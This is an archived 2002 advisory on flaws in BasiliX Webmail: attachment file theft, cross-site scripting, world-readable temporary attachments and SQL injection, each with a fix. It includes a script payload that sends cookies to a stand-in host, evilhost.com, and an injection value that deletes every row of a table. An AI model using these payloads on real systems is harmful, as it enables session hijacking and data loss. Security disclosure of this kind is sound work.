TUCoPS :: Web :: Apps :: web5472.htm

BasiliX Webmail multiple vulnerabilities
20th Jun 2002 [SBWID-5472]
COMMAND

	BasiliX multiple vulnerabilities

SYSTEMS AFFECTED

	BasiliX 1.1.0 and all previous versions

PROBLEM

	Ulf Harnhammar [ulfh@update.uu.se] says:
	

	In BasiliX WebMail software :
	

	1) The  attachment  capability  in  Compose  Mail  can  be  fooled  into
	treating any file on the web server as the  uploaded  file.  This  means
	that it is easy to steal sensitive information on that server (like  the
	/etc/passwd file), and mail it off to someone.
	

	When uploading files, PHP sets  some  global  variables,  one  of  which
	gives the temporary location where the uploaded  file  was  stored.  PHP
	usually also sets global variables with GET or POST form  data.  BasiliX
	doesn\'t check if the attachment really was uploaded by the user, or  if
	it just was some POST data with the same format.
	

	This issue can be fixed by using  the  is_uploaded_file()  function,  to
	see if a file was in fact uploaded.
	

	2) The program  has  got  some  cross-site  scripting  issues.  In  mail
	folders, in Find Mail and when you read  a  message,  the  Subject  mail
	header is shown without removing any HTML tags. When a message is  read,
	the mail body is also shown without removing any HTML tags.  This  means
	that an attacker can include JavaScript code in an e-mail  message,  and
	that it will be executed in the user\'s browser when he or she looks  at
	that message.
	

	This can be used for stealing a user\'s cookies, to allow  the  attacker
	to take over the user\'s session,  by  including  JavaScript  code  like
	this:
	

	<script>self.location.href=\"http://evilhost.com/evil?\"+escape(document.

	cookie)</script>

	

	It can also be used as a form of Denial of Service attack. If  there  is
	a message in your inbox folder that immediately redirects  your  browser
	to Slashdot as soon as you enter that folder, it  gets  rather  hard  to
	read your e-mail.
	

	This can be fixed by always using the htmlspecialchars()  function  when
	printing variables that shouldn\'t contain HTML tags.
	

	3) The attached files are saved in /tmp/BasiliX. They  are  readable  by
	all users, and it seems like they never get  deleted.  This  means  that
	anyone who has got shell access to the server, or  who  can  upload  web
	scripts to it, can read all files any  user  has  ever  attached  to  an
	e-mail.
	

	4) BasiliX has got  some  SQL  Injection  holes.  If  you  have  an  SQL
	statement where data from  outside  is  not  placed  in  apostrophes  or
	quotes, like this:
	

	DELETE FROM table WHERE id=$id

	

	you can wipe all rows in the table by giving $id the value \"id\".  This
	will execute the statement:
	

	DELETE FROM table WHERE id=id

	

	The way to fix this is  to  put  all  outside  data  in  apostrophes  or
	quotes, like this:
	

	DELETE FROM table WHERE id=\'$id\'

	

	or to use PHP\'s is_numeric() function.

SOLUTION

	None yet.
	

	Check : http://basilix.org/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH